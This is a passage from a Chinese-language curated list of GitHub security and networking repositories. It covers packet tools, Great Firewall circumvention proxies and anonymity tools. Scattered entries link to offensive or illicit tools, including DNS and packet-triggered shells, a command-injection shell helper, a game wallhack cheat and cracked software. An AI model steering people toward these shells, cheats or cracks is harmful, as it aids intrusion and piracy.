็ฎ€ๅ•็”จๆˆท็ฉบ้—ดๆ•ฐๆฎๅŒ…ๅค„็†ใ€‚ๆŽงๅˆถ็ฝ‘็ปœ้€‚้…ๅ™จ๏ผŒๅนถๅœจ็”จๆˆท็ฉบ้—ดไธญๅฎž็Žฐๆ•ดไธช้ฉฑๅŠจ็จ‹ๅบ - [**686**ๆ˜Ÿ][5y] [C] [antirez/hping](https://github.com/antirez/hping) ๅ‘้€่‡ชๅฎšไน‰็š„TCP / IPๆ•ฐๆฎๅŒ…ๅนถๆ˜พ็คบ็›ฎๆ ‡ๅ›žๅค๏ผŒ็ฑปไผผping ICMPๅ›žๅค - [**675**ๆ˜Ÿ][22d] [Py] [kbandla/dpkt](https://github.com/kbandla/dpkt) ๅฟซ้€Ÿใ€็ฎ€ๅ•็š„ๆ•ฐๆฎๅŒ…ๅˆ›ๅปบ/่งฃๆž๏ผŒๅธฆๆœ‰ๅŸบๆœฌTCP / IPๅ่ฎฎ็š„ๅฎšไน‰ - [**612**ๆ˜Ÿ][3y] [Py] [omriher/captipper](https://github.com/omriher/captipper) ๅˆ†ๆžใ€ๆŽข็ดขๅ’ŒๆขๅคHTTPๆถๆ„ๆต้‡๏ผŒPythonๅทฅๅ…ท - [**511**ๆ˜Ÿ][2y] [Py] [sjvasquez/web-traffic-forecasting](https://github.com/sjvasquez/web-traffic-forecasting) ๅœจKaggleไธปๆŒ็š„Webๆต้‡้ข„ๆต‹็ซž่ต›็š„่งฃๅ†ณๆ–นๆกˆ - [**405**ๆ˜Ÿ][13d] [HTML] [thinkst/canarytokens](https://github.com/thinkst/canarytokens) ่ทŸ่ธช็ฝ‘็ปœไธŠ็š„ๆดปๅŠจๅ’ŒๅŠจไฝœ - [**393**ๆ˜Ÿ][3m] [Go] [alphasoc/flightsim](https://github.com/alphasoc/flightsim) ็”Ÿๆˆๆถๆ„็ฝ‘็ปœๆต้‡ๅนถ่ฏ„ไผฐๆŽงไปถ็š„ๅฎž็”จ็จ‹ๅบ - [**386**ๆ˜Ÿ][3y] [Py] [sensepost/dns-shell](https://github.com/sensepost/dns-shell) ๅŸบไบŽDNS็š„ไบคไบ’ๅผShell - [**333**ๆ˜Ÿ][1y] [Ruby] [packetfu/packetfu](https://github.com/packetfu/packetfu) ๆ•ฐๆฎๅŒ…็ฏกๆ”นๅทฅๅ…ทใ€‚Ruby็ผ–ๅ†™ - [**304**ๆ˜Ÿ][2y] [JS] [kristian-lange/net-glimpse](https://github.com/kristian-lange/net-glimpse) ็ฝ‘็ปœๆต้‡๏ผˆไปฅๅคช็ฝ‘ๅ’ŒInternet๏ผ‰็š„ๅฎžๆ—ถๅฏ่ง†ๅŒ–๏ผŒไปฅๅŠ้€š่ฟ‡WebSocketไปŽ็ฝ‘็ปœๆŽฅๅฃSteaming headerๆ•ฐๆฎ - [**267**ๆ˜Ÿ][4m] [Py] [fwkz/riposte](https://github.com/fwkz/riposte) ๅฐ†ๅบ”็”จ็จ‹ๅบๅŒ…่ฃ…ๅœจๅฎšๅˆถ็š„ไบคไบ’ๅผShellไธญใ€‚PythonๅŒ… - [**259**ๆ˜Ÿ][3m] [Go] [sachaos/tcpterm](https://github.com/sachaos/tcpterm) ๆ•ฐๆฎๅŒ…ๅฏ่ง†ๅŒ– - [**227**ๆ˜Ÿ][3y] [Py] [praetorian-code/pyshell](https://github.com/praetorian-code/pyshell) ็ฎ€ๅŒ–ๅŸบไบŽWeb็š„ๅ‘ฝไปคๆณจๅ…ฅ๏ผŒๅฐฝๅฏ่ƒฝๅœฐๆจกๆ‹Ÿไบคไบ’ๅผshell็š„ๆ„Ÿ่ง‰ - [**206**ๆ˜Ÿ][3y] [Py] [countercept/doublepulsar-c2-traffic-decryptor](https://github.com/countercept/doublepulsar-c2-traffic-decryptor) ๅค„็†PCAPๆ–‡ไปถ๏ผŒ่งฃๅฏ†ๅ‘้€ๅˆฐDOUBLEPULSAR implant็š„C2ๆต้‡ - [**134**ๆ˜Ÿ][10m] [C] [yadutaf/tracepkt](https://github.com/yadutaf/tracepkt) ่ทŸ่ธช Linux ็ณป็ปŸ PING ๆ•ฐๆฎๅŒ…่ทจ็ฝ‘็ปœๆŽฅๅฃๅ’Œๅ‘ฝๅ็ฉบ้—ด็š„่ทฏ็บฟ๏ผŒๆ”ฏๆŒ IPv4 ๅŠ IPv6 - [**104**ๆ˜Ÿ][2y] [Shell] [joarleymoraes/net_guard](https://github.com/joarleymoraes/net_guard) ๅ‘ฝไปค่กŒๅทฅๅ…ท, ๅˆฉ็”จ ARP ๅ่ฎฎๆฃ€ๆต‹็ฝ‘็ปœไธญ็š„ๆœช็Ÿฅ่ฎพๅค‡ - [**53**ๆ˜Ÿ][3y] [Py] [wraith-wireless/pyric](https://github.com/wraith-wireless/pyric) ๆ— ็บฟๆŽฅๅฃๆŽงๅˆถๅ™จ๏ผŒPython็ผ–ๅ†™ - [**43**ๆ˜Ÿ][2d] [Go] [x-way/iptables-tracer](https://github.com/x-way/iptables-tracer) ๅฐ†่ทŸ่ธช็‚นๆ’ๅ…ฅๆญฃๅœจ่ฟ่กŒ็š„้…็ฝฎไธญ๏ผŒไปฅ่ง‚ๅฏŸๆ•ฐๆฎๅŒ…้€š่ฟ‡iptables้“พ็š„่ทฏๅพ„ - [**31**ๆ˜Ÿ][5m] [Py] [mechpen/sockdump](https://github.com/mechpen/sockdump) ไฝฟ็”จbpf่ฝฌๅ‚จunixๅŸŸๅฅ—ๆŽฅๅญ—ๆต้‡ - [**21**ๆ˜Ÿ][2y] [C] [circl/pcapdj](https://github.com/circl/pcapdj) dispatch pcap files - [**20**ๆ˜Ÿ][5y] [Py] [mk-fg/nflog-zmq-pcap-pipe](https://github.com/mk-fg/nflog-zmq-pcap-pipe) Tool to collect nflog and pipe it to a pcap stream/file over network (0mq) for real-time (or close to) analysis - [**17**ๆ˜Ÿ][5m] [stvemillertime/absolutely-positively-not-hacking-back-with-pcap](https://github.com/stvemillertime/absolutely-positively-not-hacking-back-with-pcap) Streaming Unexpected Network Byte Sequences with High Probability of Blue Screening or Otherwise Crashing Attacker Command-and-Control Nodes - [**15**ๆ˜Ÿ][7m] [C] [magisterquis/pcapknock](https://github.com/magisterquis/pcapknock) Watches for trigger packets, runs commands or spawns a shell - [**15**ๆ˜Ÿ][7y] [Py] [opensecurityresearch/clipcaptcha](https://github.com/opensecurityresearch/clipcaptcha) A Tool for Impersonating CAPTCHA Providers - [**14**ๆ˜Ÿ][2m] [OCaml] [mirage/ocaml-pcap](https://github.com/mirage/ocaml-pcap) OCaml code for generating and analysing pcap (packet capture) files - [**13**ๆ˜Ÿ][19d] [C++] [fkie-cad/pcapfs](https://github.com/fkie-cad/pcapfs) A FUSE module to mount captured network data - [**11**ๆ˜Ÿ][3y] [Perl] [icgc-tcga-pancancer/pcap-core](https://github.com/icgc-tcga-pancancer/pcap-core) Legacy, see cancerit/PCAP-core: NGS reference implementations and helper code for the IGCG/TCGA Pan-Cancer Analysis Project - [**7**ๆ˜Ÿ][6y] [JS] [sparrowprince/webpcap](https://github.com/sparrowprince/webpcap) A web-based packet analyzer (client/server architecture). Useful for analyzing distributed applications or embedded devices. - [**4**ๆ˜Ÿ][6y] [C] [hbock/libairpcap-nl](https://github.com/hbock/libairpcap-nl) Implementation of AirPcap library, targetting the NL80211 protocol. - [**3**ๆ˜Ÿ][4y] [Py] [reyammer/csawctf-quals-2015-pcapin](https://github.com/reyammer/csawctf-quals-2015-pcapin) # <a id="837c9f22a3e1bb2ce29a0fb2bcd90b8f"></a>็ฟปๅข™&&GFW *** ## <a id="af9d2b4988d35a2a634c042a1c66bb8c"></a>ๅทฅๅ…ท ### <a id="fe72fb9498defbdbb98448511cd1eaca"></a>ๆœชๅˆ†็ฑป - [**2937**ๆ˜Ÿ][12m] [Shell] [91yun/serverspeeder](https://github.com/91yun/serverspeeder) ้”้€Ÿ็ ด่งฃ็‰ˆ ### <a id="6e28befd418dc5b22fb3fd234db322d3"></a>็ฟปๅข™ - [**13874**ๆ˜Ÿ][10d] [JS] [bannedbook/fanqiang](https://github.com/bannedbook/fanqiang) ็ฟปๅข™-็ง‘ๅญฆไธŠ็ฝ‘ - [**11682**ๆ˜Ÿ][13d] [getlantern/download](https://github.com/getlantern/download) Lanternๅฎ˜ๆ–น็‰ˆๆœฌไธ‹่ฝฝ ่“็ฏ ็ฟปๅข™ ็ง‘ๅญฆไธŠ็ฝ‘ ๅค–็ฝ‘ ๅŠ ้€Ÿๅ™จ ๆขฏๅญ ่ทฏ็”ฑ - [**3960**ๆ˜Ÿ][7d] [hq450/fancyss_history_package](https://github.com/hq450/fancyss_history_package) ็ง‘ๅญฆไธŠ็ฝ‘ๆ’ไปถ็š„็ฆป็บฟๅฎ‰่ฃ…ๅŒ…ๅ‚จๅญ˜ๅœจ่ฟ™้‡Œ - [**3121**ๆ˜Ÿ][21d] [Shell] [softwaredownload/openwrt-fanqiang](https://github.com/softwaredownload/openwrt-fanqiang) ๆœ€ๅฅฝ็š„่ทฏ็”ฑๅ™จ็ฟปๅข™ใ€็ง‘ๅญฆไธŠ็ฝ‘ๆ•™็จ‹โ€”OpenWrtโ€”shadowsocks - [**1261**ๆ˜Ÿ][1y] [PHP] [you2php/delete](https://github.com/you2php/delete) ๏ผˆ่ฟซไบŽๅŽ‹ๅŠ›๏ผŒๆœฌ้กน็›ฎๅœๆญข็ปดๆŠค๏ผŒ่ฏทๅฐฝๅฟซforkไปฃ็ ใ€‚1ๆœˆ1ๆ—ฅไน‹ๅŽๅˆ ้™ค้กน็›ฎ๏ผ‰[ๅ…็ฟปๅข™ๅทฅๅ…ท]A free and open-source youtube video proxy script [Written in PHP] - [**982**ๆ˜Ÿ][3y] [Py] [dowsnature/dowsdns](https://github.com/dowsnature/dowsdns) ๅฟซ้€Ÿ็ฟป่ทƒไธญๅ›ฝ้˜ฒ็ซๅข™ - [**847**ๆ˜Ÿ][3y] [C] [examplecode/mproxy](https://github.com/examplecode/mproxy) c ่ฏญ่จ€ๅฎž็Žฐ็š„ไธ€ไธชๆœ€ๅฐ็š„httpไปฃ็†๏ผŒๆ”ฏๆŒ็ฟปๅข™ - [**504**ๆ˜Ÿ][2m] [hugetiny/awesome-vpn](https://github.com/hugetiny/awesome-vpn) A curated list of awesome free VPNs and proxies.ๅ…่ดน็š„ไปฃ็†,็ง‘ๅญฆไธŠ็ฝ‘,็ฟปๅข™๏ผŒๆขฏๅญๅคง้›†ๅˆ - [**360**ๆ˜Ÿ][2y] [udpsec/awesome-vpn](https://github.com/udpsec/awesome-vpn) ็ง‘ๅญฆไธŠ็ฝ‘็š„ๆœ‰่ถฃ้กน็›ฎ้›†้”ฆ๏ผŒๆฌข่ฟŽๅคงๅฎถpr่‡ชๅทฑๅ–œๆฌข็š„้กน็›ฎๅˆฐ่ฟ™้‡Œใ€‚ - [**341**ๆ˜Ÿ][13d] [Go] [getlantern/lantern](https://github.com/getlantern/lantern) Lanternๅฎ˜ๆ–น็‰ˆๆœฌไธ‹่ฝฝ ่“็ฏ ็ฟปๅข™ ็ง‘ๅญฆไธŠ็ฝ‘ ๅค–็ฝ‘ ๅŠ ้€Ÿๅ™จ ๆขฏๅญ ่ทฏ็”ฑ lantern censorship-circumvention censorship gfw vpn accelerator - [**315**ๆ˜Ÿ][7m] [waylau/vpngate-mirrors](https://github.com/waylau/vpngate-mirrors) Here are the newset VPN Gate web siteโ€™s mirrors .With the VPN Gate, you can get through your government's firewall to browse restricted websites.ๆไพ›ๆœ€ๆ–ฐ็š„่ฎฟ้—ฎ VPN Gate ้•œๅƒ็ฝ‘็ซ™,้€š่ฟ‡ไฝฟ็”จ VPN ่‡ช็”ฑ่ฎฟ้—ฎไบ’่”็ฝ‘(็ฟปๅข™)๏ผ - [**266**ๆ˜Ÿ][3y] [waylau/free-vpn](https://github.com/waylau/free-vpn) We Provide Newset Free VPN Service. PC, mobile phones and network appliances, no software installation. With the VPN Service,you can get through your government's firewall to browse restricted websites.ๆไพ›ๆœ€ๆ–ฐ็š„ๅ…่ดน็š„ VPN ๆœๅŠก,้€š่ฟ‡ไฝฟ็”จ VPN ่‡ช็”ฑ่ฎฟ้—ฎไบ’่”็ฝ‘(็ฟปๅข™)๏ผๆ— ่ฎบๆ˜ฏPC็ซฏ๏ผŒ็งปๅŠจ็ซฏ้ƒฝๆ— ้œ€ๅฎ‰่ฃ…ๅฎขๆˆท็ซฏใ€‚ - [**250**ๆ˜Ÿ][17d] [HTML] [gfw-breaker/open-proxy](https://github.com/gfw-breaker/open-proxy) ไธ€้”ฎ้ƒจ็ฝฒ่ขซๅข™็ฝ‘็ซ™ๅๅ‘ไปฃ็†; ๅ…็ฟปๅข™่ฎฟ้—ฎ่ขซ็ฆ็ฝ‘็ซ™ - [**132**ๆ˜Ÿ][2y] [sky8964/home](https://github.com/sky8964/home) ใ€ๅข™ๅค–ๅˆฐๅข™ๅ†…ๆฌ่ฟๅทฅใ€‘้ƒญๆ–‡่ดต ๆŽจ็‰นๅ…š ๅ…ฒๆœๆตฎไธ–็ป˜ ๅฐๆฐ‘ไน‹ๅฟƒ ่พ›็ๅนด ๆ›น้•ฟ้’ ่ข็บขๅ†ฐ ๆ——่ข ่ข่…พ้ฃž ็ฟปๅข™ ็ง‘ๅญฆไธŠ็ฝ‘ | ๆฌ่ฟๅทฅ ่‡ช็”ฑ ๆฐ‘ไธป ๆณ•ๆฒป ๅฎชๆ”ฟ ไบบๆƒ ๅนณ็ญ‰ ่ง†้ข‘ ้Ÿณ้ข‘ ๆ–‡ๅญ—็‰ˆ ๅœจ็บฟ ๆ’ญๆ”พ ไธ‹่ฝฝ ๆฐ‘่ฟ ็ปดๆƒ ็Ž‹ๅฒๅฑฑ ๅญŸๅปบๆŸฑ ๅญ™ๅŠ›ๅ†› ๅ‚…ๆŒฏๅŽ ๆฑŸๆฃ‰ๆ’ ๆฑŸๆณฝๆฐ‘ ไน ่ฟ‘ๅนณ ๆธฉๅฎถๅฎ ็Ž‹่Šณ ่‘ฃๅฟ ๆจๆพœ ๅ‘จๅฐๅนณ ๅดๅพ ๅ”ๆŸๆกฅ e็งŸๅฎ ๆณ›ไบš ๅ…ฑไบงๅ…š ่ตตๅฎถ ็›œๅ›ฝ่ดผ ๅ†…ๅน• ้ป‘ๆš— ็พ้šพ ไธ“ๆ”ฟ ไธŠ่ฎฟ ๆธธ่กŒ ๆšดไนฑ ๆฌบ้ช— ่ฐŽ่จ€ ่…่ดฅ ้€šๅฅธ ๆƒ่ดต ้ฉฌ่ˆช ่€ๅ…ต ๆดปๆ‘˜ ๅฏ่’™ ๅข™ๅค– ๅข™ๅ†… ้˜ฒ็ซๅข™ ้˜ฒ็ซ้•ฟๅŸŽ ๅŠŸๅคซ็ฝ‘ ๅ…šๆ–‡ๅŒ– ๆฐ‘้˜ต ็ˆ†ๆ–™ ไน่ฏ„ ๆจๅปบๅˆฉ ้ƒญๅฎ่ƒœ ๆ˜ญๆ˜Ž ๅๅ…ฑ ๆณ•่ฝฎๅŠŸ ่‡ชๅช’ไฝ“ Youtube ๆฒน็ฎก ๆŽจ็‰น Twitter ็ฝ‘็›˜ ไผ ๆ’ญ ๅ…ณๆณจ ไบ”ๆฏ› ่‡ชๅนฒไบ” ็‰นๅŠก ็บขไบŒไปฃ ็บขไธ‰ไปฃ ๅฎ˜ไบŒไปฃ ๅœŸๅ…ฑ ๅ…ฑๅŒช - [**85**ๆ˜Ÿ][2y] [Py] [wanjunzh/ssct](https://github.com/wanjunzh/ssct) shadowsocks ๅŒ…่ฃ…ๅ™จ๏ผŒ็”จไบŽๆŒ็ปญ็ป•่ฟ‡้˜ฒ็ซๅข™ - [**59**ๆ˜Ÿ][3y] [Go] [jijinggang/golocproxy](https://github.com/jijinggang/golocproxy) ่ฝป้‡็บง่ถ…ๅผบๅๅ‘ไปฃ็†่ฝฏไปถ๏ผŒ็”จgo่ฏญ่จ€ๅผ€ๅ‘๏ผŒ้€š่ฟ‡ๅ…ฌๅ…ฑๅฏ็Ÿฅ็š„ๆœๅŠกๅ™จ็ซฏๅฃไปฃ็†๏ผŒๆŠŠๅฑ€ๅŸŸ็ฝ‘ๅ†…ไปปไฝ•ไธปๆœบ็š„ๆœฌๅœฐๆœๅŠกๅ‘ๅธƒ็ป™ๅฑ€ๅŸŸ็ฝ‘ๅค–็š„็”จๆˆท๏ผŒๅฏ็”จๆฅ่ทจ่ถŠๅ„็ง้˜ฒ็ซๅข™ใ€‚ - [**58**ๆ˜Ÿ][7m] [JS] [yzyjim/shadowsocks-back-china-pac](https://github.com/yzyjim/shadowsocks-back-china-pac) Shadowsocks็ฟปๅข™ๅ›žๅ›ฝPAC่ง„ๅˆ™ - [**57**ๆ˜Ÿ][8d] [zscdumin/vpn](https://github.com/zscdumin/vpn) ShadowSocks ็ฟปๅข™๏ผˆๆ”ถ่ดนๆœๅŠกๅ™จๅˆ็งŸๅฅ—้ค๏ผš150ๅ…ƒ/ๅนดใ€50ๅ…ƒ/ๅญฃๅบฆใ€20ๅ…ƒ/ๆœˆ๏ผŒ้œ€่ฆ็š„ๅฏไปฅ่”็ณปๆˆ‘๏ผ‰ - [**46**ๆ˜Ÿ][1y] [Shell] [witee/note-shadowsocks](https://github.com/witee/note-shadowsocks) ๅ…ฌๅธ็ฝ‘ๅ…ณไฝฟ็”จ shadowsocks ๆญๅปบ็ฟปๅข™็ฝ‘็ปœ - [**45**ๆ˜Ÿ][4y] [Py] [cdhigh/forwarder](https://github.com/cdhigh/forwarder) ็ฎ€ๅ•็š„HTTP่ฏทๆฑ‚่ฝฌๅ‘ๆœๅŠกๅ™จ๏ผŒ้…ๅˆKIndleEar็ฟปๅ…ฅๅข™ๅ†…ๆˆ–็ป•่ฟ‡้ƒจๅˆ†็ฝ‘็ซ™ๅฏนGAE็š„IPๅœฐๅ€็š„ๅฐ้”ใ€‚็ตๆ„Ÿๆฅ่‡ช - [**41**ๆ˜Ÿ][11m] [C++] [guohaodongpu/huangyexingdong-bug](https://github.com/guohaodongpu/huangyexingdong-bug) ่’้‡Ž่กŒๅŠจ่พ…ๅŠฉ๏ผŒ้€่ง†็ฉฟๅข™ใ€‚ๆˆ‘ๆŠŠๆบ็ ๅ‘ๅ‡บๆฅ๏ผŒ - [**40**ๆ˜Ÿ][2y] [Java] [jwnie/proxyservice](https://github.com/jwnie/proxyservice) ๆŠ“ๅ–็ฝ‘ไธŠๅ…ฌๅผ€ไปฃ็†๏ผŒ็ปดๆŠคๅฏไพ›็ˆฌ่™ซไฝฟ็”จ็š„IPๆฑ ๏ผŒๅŒบๅˆ†ๅข™ๅ†…ๅข™ๅค–ใ€http/https/socksไปฃ็†ใ€‚ - [**38**ๆ˜Ÿ][4m] [Lua] [wubonetcn/luawaf](https://github.com/wubonetcn/luawaf) A secure and privately deployable web application firewall(WAF).ไธ€ไธชๅฎ‰ๅ…จใ€ๅฏ็งๆœ‰้ƒจ็ฝฒ็š„Webๅบ”็”จ้˜ฒ็ซๅข™(WAF)ใ€‚ - [**32**ๆ˜Ÿ][3y] [archimboldimao/surgeconfig](https://github.com/archimboldimao/surgeconfig) ่ฟ™ๆ˜ฏๆˆ‘ๆ—ฅๅธธไฝฟ็”จ Surge ้…็ฝฎ Shadowsocks ไปฃ็†็ฟปๅข™็š„ๆ–‡ไปถใ€‚ - [**30**ๆ˜Ÿ][4y] [comeforu2012/fq_faq](https://github.com/comeforu2012/fq_faq) ็ฟปๅข™ๅธธ่ง้—ฎ้ข˜ - [**27**ๆ˜Ÿ][5m] [HTML] [firewalltutor/firewalltutor.github.io](https://github.com/firewalltutor/firewalltutor.github.io) fire wall tutor ่‡ชๅปบๆขฏๅญๆ•™็จ‹ Google ็ฟปๅข™ ็ง‘ๅญฆไธŠ็ฝ‘ ไปฃ็†ๅทฅๅ…ท ไธ€้”ฎๅฎ‰่ฃ… - [**24**ๆ˜Ÿ][1y] [PS] [jiangxianli/googlehosttool](https://github.com/jiangxianli/googlehosttool) ไธ€้”ฎๆทปๅŠ ๆœ€ๆ–ฐgoogle hostsๆ–‡ไปถๅˆฐๆœฌๅœฐhostsๆ–‡ไปถไธญ๏ผŒgoogle ็ฟปๅข™่ฎฟ้—ฎๅทฅๅ…ท๏ผŒ้€‚็”จwindowsใ€linuxใ€mac - [**21**ๆ˜Ÿ][2y] [Py] [sirpsycho/firecall](https://github.com/sirpsycho/firecall) firecall: ็›ดๆŽฅๅ‘Cisco ASA้˜ฒ็ซๅข™ๅ‘้€ๅ‘ฝไปค, ๆ— ้œ€็™ปๅฝ•้˜ฒ็ซๅข™ๅŽๅ†ๅšไฟฎๆ”น ### <a id="e9cc4e00d5851a7430a9b28d74f297db"></a>GFW - [**14867**ๆ˜Ÿ][2m] [gfwlist/gfwlist](https://github.com/gfwlist/gfwlist) gfwlist - [**5116**ๆ˜Ÿ][3d] [ASP] [hq450/fancyss](https://github.com/hq450/fancyss) fancyss is a project providing tools to across the GFW on asuswrt/merlin based router. - [**4922**ๆ˜Ÿ][1y] [Go] [yinghuocho/firefly-proxy](https://github.com/yinghuocho/firefly-proxy) A proxy software to help circumventing the Great Firewall. - [**3712**ๆ˜Ÿ][] [acl4ssr/acl4ssr](https://github.com/acl4ssr/acl4ssr) SSR ๅŽปๅนฟๅ‘ŠACL่ง„ๅˆ™/SSๅฎŒๆ•ดGFWList่ง„ๅˆ™๏ผŒTelegram้ข‘้“่ฎข้˜…ๅœฐๅ€ - [**3632**ๆ˜Ÿ][3m] [C++] [trojan-gfw/trojan](https://github.com/trojan-gfw/trojan) An unidentifiable mechanism that helps you bypass GFW. - [**2781**ๆ˜Ÿ][2y] [C] [seclab-ucr/intang](https://github.com/seclab-ucr/intang) research project for circumventing the "TCP reset attack" from the Great Firewall of China (GFW) by disrupting/desynchronizing the TCP Control Block (TCB) on the censorship devices. - [**1852**ๆ˜Ÿ][1y] [Py] [jinnlynn/genpac](https://github.com/jinnlynn/genpac) PAC/Dnsmasq/Wingy file Generator, working with gfwlist, support custom rules. - [**1407**ๆ˜Ÿ][8d] [Java] [chinashiyu/gfw.press](https://github.com/chinashiyu/gfw.press) GFW.Pressๆ–ฐไธ€ไปฃๅ†›็”จ็บง้ซ˜ๅผบๅบฆๅŠ ๅฏ†ๆŠ—ๅนฒๆ‰ฐ็ฝ‘็ปœๆ•ฐๆฎ้ซ˜้€Ÿไผ ่พ“่ฝฏไปถ - [**1195**ๆ˜Ÿ][7y] [Py] [mothran/mongol](https://github.com/mothran/mongol) A simple python tool to pinpoint the IP addresses of machines working for the Great Firewall of China. - [**626**ๆ˜Ÿ][4y] [JS] [n0wa11/gfw_whitelist](https://github.com/n0wa11/gfw_whitelist) A Pac File of the Whitelisted Websites for the Great Firewall of China (GFW) - [**613**ๆ˜Ÿ][8m] [Shell] [cokebar/gfwlist2dnsmasq](https://github.com/cokebar/gfwlist2dnsmasq) A shell script which convert gfwlist into dnsmasq rules. Python version: - [**350**ๆ˜Ÿ][22d] [Shell] [fanyueciyuan/eazy-for-ss](https://github.com/fanyueciyuan/eazy-for-ss) A Bypassgfw Collection - [**290**ๆ˜Ÿ][3y] [Py] [cokebar/gfwlist2dnsmasq_python](https://github.com/cokebar/gfwlist2dnsmasq_python) Just another python script to auto-generate dnsmasq ipset rules using gfwlist. Shell script version: - [**269**ๆ˜Ÿ][6m] [Shell] [yangchuansheng/love-gfw](https://github.com/yangchuansheng/love-gfw) - [**213**ๆ˜Ÿ][1m] [Shell] [zfl9/gfwlist2privoxy](https://github.com/zfl9/gfwlist2privoxy) ๅฐ† gfwlist.txt๏ผˆAdblock Plus ่ง„ๅˆ™๏ผ‰่ฝฌๆขไธบ privoxy.action - [**167**ๆ˜Ÿ][13d] [Py] [paloaltonetworks/ansible-pan](https://github.com/paloaltonetworks/ansible-pan) Ansible modules for Palo Alto Networks NGFWs - [**148**ๆ˜Ÿ][11m] [Shell] [aturl/awesome-anti-gfw](https://github.com/aturl/awesome-anti-gfw) ็ช็ ด็ฝ‘็ปœๅฎกๆŸฅๅ’Œๅฐ้”็š„ๅผ€ๆบๅทฅๅ…ทๆธ…ๅ•ใ€‚ - [**123**ๆ˜Ÿ][7y] [steamedfish/gfwiplist](https://github.com/steamedfish/gfwiplist) ๅฏ็”จไบŽ็ฟปๅข™่ทฏ็”ฑ่กจ็š„ๅข™ๅค–IPๅˆ—่กจ - [**116**ๆ˜Ÿ][2y] [gfwlist/tinylist](https://github.com/gfwlist/tinylist) Tiny version of gfwlist, focusing on common websites ONLY - [**102**ๆ˜Ÿ][12m] [searking/ggfwzs_in_hack](https://github.com/searking/ggfwzs_in_hack) hack VIP for chrome-extension ่ฐทๆญŒ่ฎฟ้—ฎๅŠฉๆ‰‹ - [**86**ๆ˜Ÿ][22d] [Go] [asche910/flynet](https://github.com/asche910/flynet) A powerful TCP/UDP tool, which support socks5 proxy by tcp and udp, http proxy and NAT traversal. This tool can help you bypass gfw easily - [**79**ๆ˜Ÿ][3m] [comwrg/fuck-gfw](https://github.com/comwrg/fuck-gfw) ่ฎฐๅฝ•ๅ„ไธชๅŒ…็ฎก็†ๅ™จไฝฟ็”จไปฃ็†็š„ๆ–นๆณ•, ๅ› ไธบGFWๅทฒ็ปๆตช่ดนไบ†ๅทฒ็ปๆ•ฐไธๆธ…็š„ๆ—ถ้—ด, FUCK GFW - [**55**ๆ˜Ÿ][3m] [Java] [arloor/httpproxy](https://github.com/arloor/httpproxy) a netty-based http proxy that breaks the GFWใ€‚ - [**30**ๆ˜Ÿ][10m] [smallstrong0/ss](https://github.com/smallstrong0/ss) I spend many ways to break the GFW,and this is my destination. - [**28**ๆ˜Ÿ][3y] [iqiancheng/shadowsocks-awesome](https://github.com/iqiancheng/shadowsocks-awesome) ไธ€ไธชๅฎžๆ—ถๆ›ดๆ–ฐ็š„ๅฎž็”จgfwlistๆธ…ๅ•ใ€‚็”จไบŽss็š„PAC่‡ชๅŠจๅˆ†ๆตใ€‚ - [**26**ๆ˜Ÿ][2m] [HTML] [trojan-tutor/trojan-tutor.github.io](https://github.com/trojan-tutor/trojan-tutor.github.io) trojan ๆ•™็จ‹ ่‡ชๅปบๆขฏๅญๆ•™็จ‹ trojanๆ•™็จ‹ trojan-gfw ็ง‘ๅญฆไธŠ็ฝ‘ ไปฃ็†ๅทฅๅ…ท ็ฟปๅข™ Ubuntu Debian ๅฐ็™ฝๆ•™็จ‹ httpsไผช่ฃ… - [**24**ๆ˜Ÿ][13d] [kylebing/sslist](https://github.com/kylebing/sslist) ไผ˜ๅŒ–่ฎฟ้—ฎ้€Ÿๅบฆ็š„ๅฐๅž‹ gfw (Great Fire Wall) ่ง„ๅˆ™ๅˆ—่กจ gfwlist - [**20**ๆ˜Ÿ][t] [Py] [natescarlet/gfwlist.acl](https://github.com/natescarlet/gfwlist.acl) - [**18**ๆ˜Ÿ][5d] [JS] [wri/gfw-mapbuilder](https://github.com/wri/gfw-mapbuilder) Template for the GFW Map Builder that is available through ArcGIS Online, as a stand-alone web application, & a library to build custom Forest Atlas web applications - [**17**ๆ˜Ÿ][6d] [awesome-doge/breaking-gfw-book](https://github.com/awesome-doge/breaking-gfw-book) ๆ•ด็†ๆ‰€ๆœ‰็š„็ฟป็‰†ๆ–นๆณ•๏ผŒๆŒ็บŒๆ›ดๆ–ฐ....ๆญก่ฟŽPR - [**15**ๆ˜Ÿ][3m] [Shell] [zfl9/gfwlist2dnsmasq](https://github.com/zfl9/gfwlist2dnsmasq) ๅฐ† gfwlist.txt๏ผˆAdblock Plus ่ง„ๅˆ™๏ผ‰่ฝฌๆขไธบ dnsmasq.conf - [**11**ๆ˜Ÿ][1y] [C#] [limiqs/litrojan](https://github.com/limiqs/litrojan) Litrojan - Lite User Interface for Trojan, an unidentifiable mechanism that helps you bypass GFW. - [**11**ๆ˜Ÿ][1y] [Shell] [sutra/gfwlist2dnsmasq.awk](https://github.com/sutra/gfwlist2dnsmasq.awk) Convert gfwlist into dnsmasq configuration file. - [**6**ๆ˜Ÿ][5m] [Shell] [jm33-m0/w411brk](https://github.com/jm33-m0/w411brk) linux้€ๆ˜Ž็ฟปๅข™ไปฃ็†ๆญๅปบ / some tools for gfw evasion - [**4**ๆ˜Ÿ][2y] [Go] [cn4/gfwlist2glider](https://github.com/cn4/gfwlist2glider) gfwlist to glider rule file - [**3**ๆ˜Ÿ][2y] [Py] [fpfeng/gfwlist2potatso](https://github.com/fpfeng/gfwlist2potatso) transfer gfwlist to potatso rulesets - [**2**ๆ˜Ÿ][8m] [JS] [lifenjoiner/ezx-pac](https://github.com/lifenjoiner/ezx-pac) ez (Easylist) + x (gfwlist) pac (Proxy Auto-Config) file template and auto generating for IE/EDGE and firefox - [**1**ๆ˜Ÿ][8m] [C++] [guidovranken/gfwx-fuzzers](https://github.com/guidovranken/gfwx-fuzzers) *** ## <a id="8c94b343a7f1fb63a1ac538d032425a0"></a>ๆ–‡็ซ  # <a id="b03a7c05fd5b154ad593b6327578718b"></a>ๅŒฟๅ็ฝ‘็ปœ *** ## <a id="6e80463404d46f0493cf6e84597e4b5c"></a>ๅทฅๅ…ท ### <a id="f0979cd783d1d455cb5e3207d574aa1e"></a>ๆœชๅˆ†็ฑป - [**90**ๆ˜Ÿ][1y] [Py] [thelinuxchoice/anonymouse](https://github.com/thelinuxchoice/anonymouse) Python script to send anonymous email using anonymouse.org - [**36**ๆ˜Ÿ][11m] [Shell] [keeganjk/kali-anonymous](https://github.com/keeganjk/kali-anonymous) - [**7**ๆ˜Ÿ][2y] [HTML] [surfer77/becominganonymous.com](https://github.com/surfer77/becominganonymous.com) The Becoming Anonymous website, you are welcome to contribute! - [**5**ๆ˜Ÿ][4y] [HTML] 